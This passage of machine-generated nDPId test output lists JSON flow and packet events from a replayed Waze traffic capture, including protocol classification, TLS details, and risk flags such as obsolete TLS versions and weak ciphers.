-00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587898822,"flow_last_seen":1435587898822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587898822,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1435587898822,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587898822,"pkt":"ABoRAAACABoRAAABCABFAAA8qMZAAEAGamAKCAABbKiw5MaMAbuJft8IAAAAAKAC\/\/93xAAAAgQFtAQCCAoACHfOAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1435587898824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAodXtAABAGzb9sqLDkCggAAQG7xox2gSD3iX7fCVAS\/\/+\/9AAA"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1435587898824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAoqMdAAEAGanMKCAABbKiw5MaMAbuJft8JdoEg+FAQ\/\/+\/9QAA"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587905035,"flow_last_seen":1435587905035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587905035,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1435587905035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587905035,"pkt":"ABoRAAACABoRAAABCABFAAA82iNAAEAGeqYKCAABLjOtto0pAbvwXaAfAAAAAKAC\/\/\/IZgAAAgQFtAQCCAoACHo8AAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1435587905038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905038,"pkt":"ABoRAAACABoRAAABCABFAAAodYZAABAGD1guM622CggAAQG7jSkPol\/g8F2gIFAS\/\/86+wAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1435587905039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905039,"pkt":"ABoRAAACABoRAAABCABFAAAo2iRAAEAGerkKCAABLjOtto0pAbvwXaAgD6Jf4VAQ\/\/86\/AAA"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01096{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} 
-01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} 
-00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 